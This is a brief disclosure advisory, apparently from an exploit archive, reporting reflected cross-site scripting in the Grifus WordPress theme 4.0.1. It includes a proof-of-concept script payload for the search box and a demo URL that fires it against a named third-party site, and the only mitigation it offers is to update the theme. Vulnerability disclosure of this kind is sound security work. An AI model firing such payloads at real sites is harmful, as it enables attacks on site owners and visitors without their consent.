WordPress Grifus 4.0.1 Cross Site Scripting

WordPress Grifus theme version 4.0.1 suffers from a cross site scripting vulnerability.


MD5 | 13f5e84da1d535b4d27885e13f635678

======
Title: Grifus WordPress Themes XSS Vuln
Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
=======

Description
================
Grifus WordPress theme For movies Web

POC:
========
1. Go To Terget Web
2. Click Search box
3. Now Give This Payload in Search box "
<script>prompt(document.domain)</script>
"
4. Now See xss Will be Exclude

Demo:
======
http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.
domain%29%3C%2Fscript%3E

Mitigations
================
Update Your Themes



--
Thanks
Sajibe Kanti
Independent Web Security Researcher <https://twitter.com/Sajibekantibd>

Related Posts

Comments